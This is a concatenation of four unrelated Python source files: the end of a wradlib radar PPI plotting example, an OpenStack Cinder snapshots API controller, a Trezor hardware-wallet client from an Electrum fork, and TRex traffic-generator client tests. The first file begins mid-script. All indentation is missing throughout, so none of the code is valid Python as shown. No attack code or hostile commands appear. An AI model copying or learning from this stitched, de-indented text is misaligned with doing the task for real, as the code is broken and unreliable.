t = pl.title('Sector CG PPI')
t.set_y(1.05)
pl.tight_layout()
# plot some additional polar and cartesian data
# cgax and caax plot both cartesian data
# paax plots polar data
# plot on cartesian axis
caax.plot(-60, -60, 'ro', label="caax")
caax.plot(-50, -70, 'ro')
# plot on polar axis
xx, yy = np.meshgrid(230, 90)
paax.plot(xx, yy, 'bo')
paax.plot(220, 90, 'bo', label="paax")
# plot on cg axis (same as on cartesian axis)
cgax.plot(-50, -60, 'go', label="cgax")
# legend on main cg axis
cgax.legend()
# ----------------------------------------------------------------
# figure #3
# now let's plot with given range and theta arrays
# and plot some annotation and colorbar
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, r, az, autoext=True,
refrac=False)
t = pl.title('Decorated CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
pl.tight_layout()
# ----------------------------------------------------------------
# figure #4
# now let's just plot a sector of data
# and plot some annotation and colorbar
# create an floating axis for range
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False,
refrac=False)
t = pl.title('Decorated Sector CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
cgax.axis["lat"] = cgax.new_floating_axis(0, 240)
cgax.axis["lat"].set_ticklabel_direction('-')
cgax.axis["lat"].label.set_text("range [km]")
cgax.axis["lat"].label.set_rotation(180)
cgax.axis["lat"].label.set_pad(10)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5
# plot figure #1-4 in one figure 2x2 grid
pl.figure()
# figure #5-1
# the simplest call, plot cg ppi in new window
# plot simple CG PPI
wradlib.vis.plot_cg_ppi(ma, refrac=False, subplot=221)
t = pl.title('Simple CG PPI')
t.set_y(1.05)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5-2
# now let's just plot a sector of data
# for this, we need to give the ranges and azimuths explicitly
# and one more than we pass on in the data, because we also may not use
# the autoext-feature, and otherwise the last row and column of our data
# would not be plotted
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False, refrac=False,
subplot=222)
t = pl.title('Sector CG PPI')
t.set_y(1.05)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5-3
# now let's plot with given range and theta arrays
# and plot some annotation and colorbar
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, r, az, autoext=True,
refrac=False, subplot=223)
t = pl.title('Decorated CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
pl.tight_layout()
# ----------------------------------------------------------------
# figure #5-4
# now let's just plot a sector of data
# and plot some annotation and colorbar
# create an floating axis for range
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma[200:250, 40:80],
r[40:81], az[200:251],
autoext=False,
refrac=False,
subplot=224)
t = pl.title('Decorated Sector CG PPI')
t.set_y(1.05)
cbar = pl.gcf().colorbar(pm, pad=0.075)
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
pl.text(1.0, 1.05, 'azimuth', transform=caax.transAxes, va='bottom',
ha='right')
cbar.set_label('reflectivity [dBZ]')
cgax.axis["lat"] = cgax.new_floating_axis(0, 240)
cgax.axis["lat"].set_ticklabel_direction('-')
cgax.axis["lat"].label.set_text("range [km]")
cgax.axis["lat"].label.set_rotation(180)
cgax.axis["lat"].label.set_pad(10)
pl.tight_layout()
# ----------------------------------------------------------------
# figure #6
# create figure with GridSpec
pl.figure()
gs = gridspec.GridSpec(5, 5)
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[0:3, 0:3])
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[0:3, 3:5])
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[3:5, 0:3])
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(ma, refrac=False,
subplot=gs[3:5, 3:5])
t = pl.gcf().suptitle('GridSpec CG Example')
pl.tight_layout()
# ----------------------------------------------------------------
# figure #7
# create figure with co-located x and y-axis
# using axesgrid1 toolkit
def mip_formatter(x, pos):
x = x / 1000.
fmt_str = '{:g}'.format(x)
if np.abs(x) > 0 and np.abs(x) < 1:
return fmt_str.replace("0", "", 1)
else:
return fmt_str
# angle of *cut* through ppi and scan elev.
angle = 0.0
elev = 0.0
data = np.loadtxt(os.path.dirname(__file__) + '/' + 'data/polar_dBZ_tur.gz')
# we need to have meter here for the georef function inside mip
d1 = np.arange(data.shape[1], dtype=np.float) * 1000
d2 = np.arange(data.shape[0], dtype=np.float)
data = np.roll(data, (d2 >= angle).nonzero()[0][0], axis=0)
# calculate max intensity proj
xs, ys, mip1 = wradlib.util.maximum_intensity_projection(data, r=d1, az=d2, angle=angle, elev=elev)
xs, ys, mip2 = wradlib.util.maximum_intensity_projection(data, r=d1, az=d2, angle=90+angle, elev=elev)
# normal cg plot
cgax, caax, paax, pm = wradlib.vis.plot_cg_ppi(data, r=d1, az=d2, refrac=True)
cgax.set_xlim(-np.max(d1),np.max(d1))
cgax.set_ylim(-np.max(d1),np.max(d1))
caax.xaxis.set_major_formatter(FuncFormatter(mip_formatter))
caax.yaxis.set_major_formatter(FuncFormatter(mip_formatter))
caax.set_xlabel('x_range [km]')
caax.set_ylabel('y_range [km]')
# axes divider section
divider = make_axes_locatable(cgax)
axMipX = divider.append_axes("top", size=1.2, pad=0.1, sharex=cgax)
axMipY = divider.append_axes("right", size=1.2, pad=0.1, sharey=cgax)
# special handling for labels etc.
cgax.axis["right"].major_ticklabels.set_visible(False)
cgax.axis["top"].major_ticklabels.set_visible(False)
axMipX.xaxis.set_major_formatter(NullFormatter())
axMipX.yaxis.set_major_formatter(FuncFormatter(mip_formatter))
axMipX.yaxis.set_major_locator(MaxNLocator(5))
axMipY.yaxis.set_major_formatter(NullFormatter())
axMipY.xaxis.set_major_formatter(FuncFormatter(mip_formatter))
axMipY.xaxis.set_major_locator(MaxNLocator(5))
# plot max intensity proj
ma = np.ma.array(mip1, mask=np.isnan(mip1))
axMipX.pcolormesh(xs, ys, ma)
ma = np.ma.array(mip2, mask=np.isnan(mip2))
axMipY.pcolormesh(ys.T, xs.T, ma.T)
# set labels, limits etc
axMipX.set_xlim(-np.max(d1),np.max(d1))
axMipX.set_ylim(0, wradlib.georef.beam_height_n(d1[-2], elev))
axMipY.set_xlim(0, wradlib.georef.beam_height_n(d1[-2], elev))
axMipY.set_ylim(-np.max(d1),np.max(d1))
axMipX.set_ylabel('height [km]')
axMipY.set_xlabel('height [km]')
axMipX.grid(True)
axMipY.grid(True)
t = pl.gcf().suptitle('AxesDivider CG-MIP Example')
pl.show()
if __name__ == '__main__':
ex_plot_cg_ppi()
|
|
# Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The volumes snapshots api."""
import webob
from webob import exc
from cinder.api import common
from cinder.api.openstack import wsgi
from cinder.api.v1 import volumes
from cinder.api import xmlutil
from cinder import exception
from cinder.openstack.common import log as logging
from cinder.openstack.common import strutils
from cinder import utils
from cinder import volume
LOG = logging.getLogger(__name__)
def _translate_snapshot_detail_view(context, snapshot):
"""Maps keys for snapshots details view."""
d = _translate_snapshot_summary_view(context, snapshot)
# NOTE(gagupta): No additional data / lookups at the moment
return d
def _translate_snapshot_summary_view(context, snapshot):
"""Maps keys for snapshots summary view."""
d = {}
d['id'] = snapshot['id']
d['created_at'] = snapshot['created_at']
d['display_name'] = snapshot['display_name']
d['display_description'] = snapshot['display_description']
d['volume_id'] = snapshot['volume_id']
d['status'] = snapshot['status']
d['size'] = snapshot['volume_size']
if snapshot.get('snapshot_metadata'):
metadata = snapshot.get('snapshot_metadata')
d['metadata'] = dict((item['key'], item['value']) for item in metadata)
# avoid circular ref when vol is a Volume instance
elif snapshot.get('metadata') and isinstance(snapshot.get('metadata'),
dict):
d['metadata'] = snapshot['metadata']
else:
d['metadata'] = {}
return d
def make_snapshot(elem):
elem.set('id')
elem.set('status')
elem.set('size')
elem.set('created_at')
elem.set('display_name')
elem.set('display_description')
elem.set('volume_id')
elem.append(common.MetadataTemplate())
class SnapshotTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshot', selector='snapshot')
make_snapshot(root)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsTemplate(xmlutil.TemplateBuilder):
def construct(self):
root = xmlutil.TemplateElement('snapshots')
elem = xmlutil.SubTemplateElement(root, 'snapshot',
selector='snapshots')
make_snapshot(elem)
return xmlutil.MasterTemplate(root, 1)
class SnapshotsController(wsgi.Controller):
"""The Volumes API controller for the OpenStack API."""
def __init__(self, ext_mgr=None):
self.volume_api = volume.API()
self.ext_mgr = ext_mgr
super(SnapshotsController, self).__init__()
@wsgi.serializers(xml=SnapshotTemplate)
def show(self, req, id):
"""Return data about the given snapshot."""
context = req.environ['cinder.context']
try:
vol = self.volume_api.get_snapshot(context, id)
except exception.NotFound:
raise exc.HTTPNotFound()
return {'snapshot': _translate_snapshot_detail_view(context, vol)}
def delete(self, req, id):
"""Delete a snapshot."""
context = req.environ['cinder.context']
LOG.audit(_("Delete snapshot with id: %s"), id, context=context)
try:
snapshot = self.volume_api.get_snapshot(context, id)
self.volume_api.delete_snapshot(context, snapshot)
except exception.NotFound:
raise exc.HTTPNotFound()
return webob.Response(status_int=202)
@wsgi.serializers(xml=SnapshotsTemplate)
def index(self, req):
"""Returns a summary list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_summary_view)
@wsgi.serializers(xml=SnapshotsTemplate)
def detail(self, req):
"""Returns a detailed list of snapshots."""
return self._items(req, entity_maker=_translate_snapshot_detail_view)
def _items(self, req, entity_maker):
"""Returns a list of snapshots, transformed through entity_maker."""
context = req.environ['cinder.context']
#pop out limit and offset , they are not search_opts
search_opts = req.GET.copy()
search_opts.pop('limit', None)
search_opts.pop('offset', None)
#filter out invalid option
allowed_search_options = ('status', 'volume_id', 'display_name')
volumes.remove_invalid_options(context, search_opts,
allowed_search_options)
snapshots = self.volume_api.get_all_snapshots(context,
search_opts=search_opts)
limited_list = common.limited(snapshots, req)
res = [entity_maker(context, snapshot) for snapshot in limited_list]
return {'snapshots': res}
@wsgi.serializers(xml=SnapshotTemplate)
def create(self, req, body):
"""Creates a new snapshot."""
kwargs = {}
context = req.environ['cinder.context']
if not self.is_valid_body(body, 'snapshot'):
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
kwargs['metadata'] = snapshot.get('metadata', None)
try:
volume_id = snapshot['volume_id']
except KeyError:
msg = _("'volume_id' must be specified")
raise exc.HTTPBadRequest(explanation=msg)
try:
volume = self.volume_api.get(context, volume_id)
except exception.NotFound:
raise exc.HTTPNotFound()
force = snapshot.get('force', False)
msg = _("Create snapshot from volume %s")
LOG.audit(msg, volume_id, context=context)
if not utils.is_valid_boolstr(force):
msg = _("Invalid value '%s' for force. ") % force
raise exception.InvalidParameterValue(err=msg)
if strutils.bool_from_string(force):
new_snapshot = self.volume_api.create_snapshot_force(
context,
volume,
snapshot.get('display_name'),
snapshot.get('display_description'),
**kwargs)
else:
new_snapshot = self.volume_api.create_snapshot(
context,
volume,
snapshot.get('display_name'),
snapshot.get('display_description'),
**kwargs)
retval = _translate_snapshot_detail_view(context, new_snapshot)
return {'snapshot': retval}
@wsgi.serializers(xml=SnapshotTemplate)
def update(self, req, id, body):
"""Update a snapshot."""
context = req.environ['cinder.context']
if not body:
raise exc.HTTPUnprocessableEntity()
if 'snapshot' not in body:
raise exc.HTTPUnprocessableEntity()
snapshot = body['snapshot']
update_dict = {}
valid_update_keys = (
'display_name',
'display_description',
)
for key in valid_update_keys:
if key in snapshot:
update_dict[key] = snapshot[key]
try:
snapshot = self.volume_api.get_snapshot(context, id)
self.volume_api.update_snapshot(context, snapshot, update_dict)
except exception.NotFound:
raise exc.HTTPNotFound()
snapshot.update(update_dict)
return {'snapshot': _translate_snapshot_detail_view(context, snapshot)}
def create_resource(ext_mgr):
return wsgi.Resource(SnapshotsController(ext_mgr))
|
|
import time
from struct import pack
from electrum import ecc
from electrum.i18n import _
from electrum.util import UserCancelled, UserFacingException
from electrum.keystore import bip39_normalize_passphrase
from electrum.bip32 import BIP32Node, convert_bip32_path_to_list_of_uint32 as parse_path
from electrum.logging import Logger
from electrum.plugins.hw_wallet.plugin import OutdatedHwFirmwareException
from trezorlib.client import TrezorClient
from trezorlib.exceptions import TrezorFailure, Cancelled, OutdatedFirmwareError
from trezorlib.messages import WordRequestType, FailureType, RecoveryDeviceType
import trezorlib.btc
import trezorlib.device
MESSAGES = {
3: _("Confirm the transaction output on your {} device"),
4: _("Confirm internal entropy on your {} device to begin"),
5: _("Write down the seed word shown on your {}"),
6: _("Confirm on your {} that you want to wipe it clean"),
7: _("Confirm on your {} device the message to sign"),
8: _("Confirm the total amount spent and the transaction fee on your {} device"),
10: _("Confirm wallet address on your {} device"),
14: _("Choose on your {} device where to enter your passphrase"),
'default': _("Check your {} device to continue"),
}
class TrezorClientBase(Logger):
def __init__(self, transport, handler, plugin):
if plugin.is_outdated_fw_ignored():
TrezorClient.is_outdated = lambda *args, **kwargs: False
self.client = TrezorClient(transport, ui=self)
self.plugin = plugin
self.device = plugin.device
self.handler = handler
Logger.__init__(self)
self.msg = None
self.creating_wallet = False
self.in_flow = False
self.used()
def run_flow(self, message=None, creating_wallet=False):
if self.in_flow:
raise RuntimeError("Overlapping call to run_flow")
self.in_flow = True
self.msg = message
self.creating_wallet = creating_wallet
self.prevent_timeouts()
return self
def end_flow(self):
self.in_flow = False
self.msg = None
self.creating_wallet = False
self.handler.finished()
self.used()
def __enter__(self):
return self
def __exit__(self, exc_type, e, traceback):
self.end_flow()
if e is not None:
if isinstance(e, Cancelled):
raise UserCancelled from e
elif isinstance(e, TrezorFailure):
raise RuntimeError(str(e)) from e
elif isinstance(e, OutdatedFirmwareError):
raise OutdatedHwFirmwareException(e) from e
else:
return False
return True
@property
def features(self):
return self.client.features
def __str__(self):
return "%s/%s" % (self.label(), self.features.device_id)
def label(self):
'''The name given by the user to the device.'''
return self.features.label
def is_initialized(self):
'''True if initialized, False if wiped.'''
return self.features.initialized
def is_pairable(self):
return not self.features.bootloader_mode
def has_usable_connection_with_device(self):
if self.in_flow:
return True
try:
res = self.client.ping("electrum pinging device")
assert res == "electrum pinging device"
except BaseException:
return False
return True
def used(self):
self.last_operation = time.time()
def prevent_timeouts(self):
self.last_operation = float('inf')
def timeout(self, cutoff):
'''Time out the client if the last operation was before cutoff.'''
if self.last_operation < cutoff:
self.logger.info("timed out")
self.clear_session()
def i4b(self, x):
return pack('>I', x)
def get_xpub(self, bip32_path, xtype, creating=False):
address_n = parse_path(bip32_path)
with self.run_flow(creating_wallet=creating):
node = trezorlib.btc.get_public_node(self.client, address_n).node
return BIP32Node(xtype=xtype,
eckey=ecc.ECPubkey(node.public_key),
chaincode=node.chain_code,
depth=node.depth,
fingerprint=self.i4b(node.fingerprint),
child_number=self.i4b(node.child_num)).to_xpub()
def toggle_passphrase(self):
if self.features.passphrase_protection:
msg = _("Confirm on your {} device to disable passphrases")
else:
msg = _("Confirm on your {} device to enable passphrases")
enabled = not self.features.passphrase_protection
with self.run_flow(msg):
trezorlib.device.apply_settings(self.client, use_passphrase=enabled)
def change_label(self, label):
with self.run_flow(_("Confirm the new label on your {} device")):
trezorlib.device.apply_settings(self.client, label=label)
def change_homescreen(self, homescreen):
with self.run_flow(_("Confirm on your {} device to change your home screen")):
trezorlib.device.apply_settings(self.client, homescreen=homescreen)
def set_pin(self, remove):
if remove:
msg = _("Confirm on your {} device to disable PIN protection")
elif self.features.pin_protection:
msg = _("Confirm on your {} device to change your PIN")
else:
msg = _("Confirm on your {} device to set a PIN")
with self.run_flow(msg):
trezorlib.device.change_pin(self.client, remove)
def clear_session(self):
'''Clear the session to force pin (and passphrase if enabled)
re-entry. Does not leak exceptions.'''
self.logger.info(f"clear session: {self}")
self.prevent_timeouts()
try:
self.client.clear_session()
except BaseException as e:
# If the device was removed it has the same effect...
self.logger.info(f"clear_session: ignoring error {e}")
def close(self):
'''Called when Our wallet was closed or the device removed.'''
self.logger.info("closing client")
self.clear_session()
def is_uptodate(self):
if self.client.is_outdated():
return False
return self.client.version >= self.plugin.minimum_firmware
def get_trezor_model(self):
"""Returns '1' for Trezor One, 'T' for Trezor T."""
return self.features.model
def show_address(self, address_str, script_type, multisig=None):
coin_name = self.plugin.get_coin_name()
address_n = parse_path(address_str)
with self.run_flow():
return trezorlib.btc.get_address(
self.client,
coin_name,
address_n,
show_display=True,
script_type=script_type,
multisig=multisig)
def sign_message(self, address_str, message):
coin_name = self.plugin.get_coin_name()
address_n = parse_path(address_str)
with self.run_flow():
return trezorlib.btc.sign_message(
self.client,
coin_name,
address_n,
message)
def recover_device(self, recovery_type, *args, **kwargs):
input_callback = self.mnemonic_callback(recovery_type)
with self.run_flow():
return trezorlib.device.recover(
self.client,
*args,
input_callback=input_callback,
type=recovery_type,
**kwargs)
# ========= Unmodified trezorlib methods =========
def sign_tx(self, *args, **kwargs):
with self.run_flow():
return trezorlib.btc.sign_tx(self.client, *args, **kwargs)
def reset_device(self, *args, **kwargs):
with self.run_flow():
return trezorlib.device.reset(self.client, *args, **kwargs)
def wipe_device(self, *args, **kwargs):
with self.run_flow():
return trezorlib.device.wipe(self.client, *args, **kwargs)
# ========= UI methods ==========
def button_request(self, code):
message = self.msg or MESSAGES.get(code) or MESSAGES['default']
self.handler.show_message(message.format(self.device), self.client.cancel)
def get_pin(self, code=None):
if code == 2:
msg = _("Enter a new PIN for your {}:")
elif code == 3:
msg = (_("Re-enter the new PIN for your {}.\n\n"
"NOTE: the positions of the numbers have changed!"))
else:
msg = _("Enter your current {} PIN:")
pin = self.handler.get_pin(msg.format(self.device))
if not pin:
raise Cancelled
if len(pin) > 9:
self.handler.show_error(_('The PIN cannot be longer than 9 characters.'))
raise Cancelled
return pin
def get_passphrase(self):
if self.creating_wallet:
msg = _("Enter a passphrase to generate this wallet. Each time "
"you use this wallet your {} will prompt you for the "
"passphrase. If you forget the passphrase you cannot "
"access the fujicoins in the wallet.").format(self.device)
else:
msg = _("Enter the passphrase to unlock this wallet:")
passphrase = self.handler.get_passphrase(msg, self.creating_wallet)
if passphrase is None:
raise Cancelled
passphrase = bip39_normalize_passphrase(passphrase)
length = len(passphrase)
if length > 50:
self.handler.show_error(_("Too long passphrase ({} > 50 chars).").format(length))
raise Cancelled
return passphrase
def _matrix_char(self, matrix_type):
num = 9 if matrix_type == WordRequestType.Matrix9 else 6
char = self.handler.get_matrix(num)
if char == 'x':
raise Cancelled
return char
def mnemonic_callback(self, recovery_type):
if recovery_type is None:
return None
if recovery_type == RecoveryDeviceType.Matrix:
return self._matrix_char
step = 0
def word_callback(_ignored):
nonlocal step
step += 1
msg = _("Step {}/24. Enter seed word as explained on your {}:").format(step, self.device)
word = self.handler.get_word(msg)
if not word:
raise Cancelled
return word
return word_callback
|
|
#!/router/bin/python
from .stl_general_test import CStlGeneral_Test, CTRexScenario
from trex_stl_lib.api import *
import os, sys
import glob
from nose.tools import nottest
def get_error_in_percentage (golden, value):
if (golden==0):
return(0.0);
return abs(golden - value) / float(golden)
def get_stl_profiles ():
profiles_path = os.path.join(CTRexScenario.scripts_path, 'stl/')
py_profiles = glob.glob(profiles_path + "/*.py")
yaml_profiles = glob.glob(profiles_path + "yaml/*.yaml")
return py_profiles + yaml_profiles
class STLClient_Test(CStlGeneral_Test):
"""Tests for stateless client"""
def setUp(self):
CStlGeneral_Test.setUp(self)
self.weak = self.is_virt_nics or CTRexScenario.setup_name in ('trex21', 'trex22')
if self.weak:
self.percentage = 5
self.pps = 500
else:
self.percentage = 50
self.pps = 50000
# strict mode is only for 'wire only' connection
if self.is_loopback and not self.weak:
self.strict = True
else:
self.strict = False
assert 'bi' in CTRexScenario.stl_ports_map
self.c = CTRexScenario.stl_trex
self.tx_port, self.rx_port = CTRexScenario.stl_ports_map['bi'][0]
self.c.connect()
self.c.reset(ports = [self.tx_port, self.rx_port])
port_info = self.c.get_port_info(ports = self.rx_port)[0]
drv_name = port_info['driver']
self.drv_name = drv_name
# due to defect trex-325
#if self.drv_name == 'net_mlx5':
# print("WARNING disable strict due to trex-325 on mlx5")
# self.strict = False
self.pkt = STLPktBuilder(pkt = Ether()/IP(src="16.0.0.1",dst="48.0.0.1")/UDP(dport=12,sport=1025)/IP()/'a_payload_example')
self.profiles = get_stl_profiles()
self.c.clear_stats()
def cleanup (self):
self.c.remove_all_captures()
self.c.reset(ports = [self.tx_port, self.rx_port])
@classmethod
def tearDownClass(cls):
if CTRexScenario.stl_init_error:
return
# connect back at end of tests
if not cls.is_connected():
CTRexScenario.stl_trex.connect()
def verify (self, expected, got):
if self.strict:
assert expected == got
else:
if expected==0:
return;
else:
if get_error_in_percentage(expected, got) < 0.05 :
return
print(' ERROR verify expected: %d got:%d ' % (expected,got) )
assert(0);
def test_basic_connect_disconnect (self):
try:
self.c.connect()
assert self.c.is_connected(), 'client should be connected'
self.c.disconnect()
assert not self.c.is_connected(), 'client should be disconnected'
except STLError as e:
assert False , '{0}'.format(e)
def test_basic_single_burst (self):
try:
b1 = STLStream(name = 'burst',
packet = self.pkt,
mode = STLTXSingleBurst(total_pkts = 100,
percentage = self.percentage)
)
for i in range(0, 5):
self.c.add_streams([b1], ports = [self.tx_port, self.rx_port])
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port])
self.c.wait_on_traffic(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats
assert self.rx_port in stats
self.verify(100, stats[self.tx_port]['opackets'])
self.verify(100, stats[self.rx_port]['ipackets'])
self.verify(100, stats[self.rx_port]['opackets'])
self.verify(100, stats[self.tx_port]['ipackets'])
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
#
def test_basic_multi_burst (self):
try:
b1 = STLStream(name = 'burst',
packet = self.pkt,
mode = STLTXMultiBurst(pkts_per_burst = 10,
count = 20,
percentage = self.percentage)
)
for i in range(0, 5):
self.c.add_streams([b1], ports = [self.tx_port, self.rx_port])
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port])
self.c.wait_on_traffic(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats
assert self.rx_port in stats
self.verify(200, stats[self.tx_port]['opackets'])
self.verify(200, stats[self.rx_port]['ipackets'])
self.verify(200, stats[self.rx_port]['opackets'])
self.verify(200, stats[self.tx_port]['ipackets'])
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
#
def test_basic_cont (self):
pps = self.pps
duration = 0.1
golden = pps * duration
try:
b1 = STLStream(name = 'burst',
packet = self.pkt,
mode = STLTXCont(pps = pps)
)
for i in range(0, 5):
self.c.add_streams([b1], ports = [self.tx_port, self.rx_port])
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port], duration = duration)
assert self.c.ports[self.tx_port].is_transmitting(), 'port should be active'
assert self.c.ports[self.rx_port].is_transmitting(), 'port should be active'
self.c.wait_on_traffic(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats, 'tx port not in stats'
assert self.rx_port in stats, 'rx port not in stats'
# cont. with duration should be quite percise - 5% error is relaxed enough
check_params = (
stats[self.tx_port]['opackets'],
stats[self.rx_port]['opackets'],
stats[self.tx_port]['ipackets'],
stats[self.rx_port]['ipackets'],
)
for param in check_params:
assert get_error_in_percentage(golden, param) < 0.05, 'golden: %s, got: %s' % (golden, param)
self.c.remove_all_streams(ports = [self.tx_port, self.rx_port])
except STLError as e:
assert False , '{0}'.format(e)
def test_stress_connect_disconnect (self):
try:
for i in range(0, 100):
self.c.connect()
assert self.c.is_connected(), 'client should be connected'
self.c.disconnect()
assert not self.c.is_connected(), 'client should be disconnected'
except STLError as e:
assert False , '{0}'.format(e)
def pause_resume_update_streams_iteration(self, delay, expected_pps):
self.c.clear_stats(clear_flow_stats = False, clear_latency_stats = False, clear_xstats = False)
time.sleep(delay)
tx_pps = self.c.get_stats(ports = [0])[0]['opackets'] / delay
assert (expected_pps * 0.9 < tx_pps < expected_pps * 1.1), 'expected TX ~%spps, got: %s' % (expected_pps, tx_pps)
def test_pause_resume_update_streams(self):
self.c.reset()
s1 = STLStream(mode = STLTXSingleBurst(pps = 100, total_pkts = 9999))
s2 = STLStream(mode = STLTXCont(pps = 100))
s3 = STLStream(mode = STLTXCont(pps = 100))
s4 = STLStream(mode = STLTXCont(pps = 100), flow_stats = STLFlowLatencyStats(pg_id = 1))
s1_id, s2_id, s3_id, s4_id = self.c.add_streams([s1, s2, s3, s4], ports = [0])
self.c.start(ports = [0])
with self.assertRaises(STLError): # burst present => error
self.c.pause_streams(port = 0, stream_ids = [s3_id])
with self.assertRaises(STLError): # several ports => error
self.c.pause_streams(port = [0, 1], stream_ids = [s3_id])
self.c.stop(ports = [0])
self.c.remove_streams([s1_id], ports = [0]) # get rid of burst
self.c.start(ports = [0])
self.c.update_streams(port = 0, mult = '10kpps', stream_ids = [s3_id, s4_id]) # latency is not affected
self.pause_resume_update_streams_iteration(delay = 5, expected_pps = 10200)
self.c.update_streams(port = 0, mult = '100pps', stream_ids = [s3_id])
self.c.pause_streams(port = 0, stream_ids = [s3_id])
self.pause_resume_update_streams_iteration(delay = 5, expected_pps = 200) # paused stream not transmitting
self.c.resume_streams(port = 0, stream_ids = [s3_id])
self.pause_resume_update_streams_iteration(delay = 5, expected_pps = 300) # resume the paused
def test_stress_tx (self):
try:
s1 = STLStream(name = 'stress',
packet = self.pkt,
mode = STLTXCont(percentage = self.percentage))
# add both streams to ports
self.c.add_streams([s1], ports = [self.tx_port, self.rx_port])
for i in range(0, 100):
self.c.start(ports = [self.tx_port, self.rx_port])
assert self.c.ports[self.tx_port].is_transmitting(), 'port should be active'
assert self.c.ports[self.rx_port].is_transmitting(), 'port should be active'
self.c.pause(ports = [self.tx_port, self.rx_port])
assert self.c.ports[self.tx_port].is_paused(), 'port should be paused'
assert self.c.ports[self.rx_port].is_paused(), 'port should be paused'
self.c.resume(ports = [self.tx_port, self.rx_port])
assert self.c.ports[self.tx_port].is_transmitting(), 'port should be active'
assert self.c.ports[self.rx_port].is_transmitting(), 'port should be active'
self.c.stop(ports = [self.tx_port, self.rx_port])
assert not self.c.ports[self.tx_port].is_active(), 'port should be idle'
assert not self.c.ports[self.rx_port].is_active(), 'port should be idle'
except STLError as e:
assert False , '{0}'.format(e)
def test_all_profiles (self):
#Work around for trex-405. Remove when it is resolved
if self.drv_name == 'net_mlx5' and 'VM' in self.modes:
self.skip('Can not run on mlx VM currently - see trex-405 for details')
if self.is_virt_nics or not self.is_loopback:
self.skip('skipping profile tests for virtual / non loopback')
return
default_mult = self.get_benchmark_param('mult',default="30%")
skip_tests_per_setup = self.get_benchmark_param('skip',default=[])
skip_tests_global = ['imix_wlc.py']
try:
for profile in self.profiles:
print('\nProfile: %s' % profile[len(CTRexScenario.scripts_path):]);
skip = False
for skip_test in skip_tests_per_setup:
if skip_test in profile:
skip = True
break
if skip:
print(' * Skip due to config file...')
continue
for skip_test in skip_tests_global:
if skip_test in profile:
skip = True
break
if skip:
print(' * Skip due to global ignore of this profile...')
continue
p1 = STLProfile.load(profile, port_id = self.tx_port)
p2 = STLProfile.load(profile, port_id = self.rx_port)
# if profile contains custom MAC addrs we need promiscuous mode
# but virtual NICs does not support promiscuous mode
self.c.set_port_attr(ports = [self.tx_port, self.rx_port], promiscuous = False)
if p1.has_custom_mac_addr() or p2.has_custom_mac_addr():
if self.is_virt_nics:
print(" * Skip due to Virtual NICs and promiscuous mode requirement...")
continue
elif self.is_vf_nics:
print(" * Skip due to VF NICs and promiscuous mode requirement...")
continue
else:
self.c.set_port_attr(ports = [self.tx_port, self.rx_port], promiscuous = True)
if p1.has_flow_stats() or p2.has_flow_stats():
print(" * Skip due to RX caps requirement")
continue
self.c.add_streams(p1, ports = self.tx_port)
self.c.add_streams(p2, ports = self.rx_port)
self.c.clear_stats()
self.c.start(ports = [self.tx_port, self.rx_port], mult = default_mult)
time.sleep(0.1)
if p1.is_pauseable() and p2.is_pauseable():
self.c.pause(ports = [self.tx_port, self.rx_port])
time.sleep(0.1)
self.c.resume(ports = [self.tx_port, self.rx_port])
time.sleep(0.1)
self.c.stop(ports = [self.tx_port, self.rx_port])
stats = self.c.get_stats()
assert self.tx_port in stats, '{0} - no stats for TX port'.format(profile)
assert self.rx_port in stats, '{0} - no stats for RX port'.format(profile)
